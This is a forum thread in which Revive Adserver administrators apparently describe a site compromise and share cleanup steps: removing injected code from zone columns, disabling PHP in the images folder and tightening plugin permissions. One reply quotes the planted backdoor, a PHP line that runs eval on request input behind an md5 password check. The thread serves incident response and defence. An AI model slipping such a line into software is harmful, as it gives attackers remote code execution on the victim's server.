Snaggy

I had the same issue. The injection also changed my DB structure for the append column in the ox_zones  table. No other files were modified, but I do believe the code put in the file, did the other modification to put in the code that was added to the append column

I did also have another issue where an intruder logged into our system, the log said as me, and added code the mobile redirection directly to the ad creative.  I added a different admin user, and removed my old one... I also reinstalled revive-adserver. 

I haven't seen any traffic since then of people poking around my admin area. Just tonight someone tried to do the fc.php injection. I already have php execution disabled in my images folder. The difference now is the permissions on the plugins folder. They are unable to write to that file now.

 

Hi @vinmhas, I was in the same situation. You should review your file: plugins/bannerTypeText/oxText/genericText.delivery.php
Problably it has been modified, adding a line like this at the end:
if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}
You have to remove it. 
Also you have to search in the "images folder", for some php script ... and remove it. Perhaps you can send it privately to @Ian vM
Clean the prepend code of your zones ...  via sql o through the revive backend. Search for iframes and javascript codes.
Disable PHP execution on image folder or move image folder to "another place" as they are static files and serve them throught another subdomain. You don't need PHP for them